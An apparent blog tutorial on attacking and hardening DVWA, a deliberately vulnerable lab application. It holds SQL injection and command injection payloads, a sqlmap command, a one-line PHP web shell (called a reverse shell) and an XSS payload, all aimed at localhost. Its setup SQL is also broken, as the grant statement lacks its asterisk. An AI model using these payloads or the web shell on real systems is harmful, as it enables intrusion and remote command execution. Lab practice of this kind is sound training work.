Penetration Testing Report of DVWA

By /

Listen to this Post

DVWA (Damn Vulnerable Web Application) is a widely used platform for practicing penetration testing skills. Below is a detailed breakdown of key techniques, commands, and steps to exploit and secure DVWA.

You Should Know:

1. Setting Up DVWA

  • Download DVWA from the official GitHub repository: 
    git clone https://github.com/digininja/DVWA.git
  • Move the files to your web server (e.g., Apache): 
    sudo cp -r DVWA /var/www/html/
  • Configure the database: 
    sudo mysql -u root -p 
CREATE DATABASE dvwa; 
GRANT ALL ON dvwa. TO 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd'; 
FLUSH PRIVILEGES; 
exit
  • Update DVWA config (/var/www/html/DVWA/config/config.inc.php): 
    $_DVWA[ 'db_user' ] = 'dvwa'; 
$_DVWA[ 'db_password' ] = 'p@ssw0rd'; 
$_DVWA[ 'db_database' ] = 'dvwa';

2. Common Exploits & Commands

SQL Injection

  • Basic SQLi payload: 
    ' OR '1'='1
  • Using `sqlmap` for automation: 
    sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1" --cookie="security=low; PHPSESSID=abc123" --dbs

Command Injection

  • Exploit command execution vulnerability: 
    ; ls -la /etc/passwd
  • Test with curl: 
    curl -X POST "http://localhost/DVWA/vulnerabilities/exec/" --data "ip=127.0.0.1; whoami" --cookie "security=low; PHPSESSID=abc123"

File Upload Exploitation

  • Upload a PHP reverse shell (shell.php): 
    <?php system($_GET['cmd']); ?>
  • Execute commands via the uploaded file: 
    curl "http://localhost/DVWA/hackable/uploads/shell.php?cmd=id"

Cross-Site Scripting (XSS)

  • Stored XSS payload: 
    <script>alert('XSS')</script>
  • Test with `Burp Suite` or manually in input fields.

3. Securing DVWA

  • Set security level to `high` in DVWA settings.
  • Disable dangerous PHP functions in php.ini: 
    disable_functions = exec, shell_exec, system, passthru
  • Implement WAF rules (e.g., ModSecurity): 
    sudo apt install modsecurity-crs

What Undercode Say

DVWA is an excellent tool for learning penetration testing, but always use it ethically. Practice hardening techniques, monitor logs (/var/log/apache2/access.log), and apply patches. Automation with Metasploit, Nmap, and `Burp Suite` enhances testing efficiency.

Expected Output:

  • Successful SQLi exploitation reveals database contents.
  • Command injection returns server-side command outputs.
  • Uploaded shells allow remote code execution.
  • XSS payloads trigger browser alerts.

Further Reading:

References:

Reported By: Penetester Squad – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Related Posts: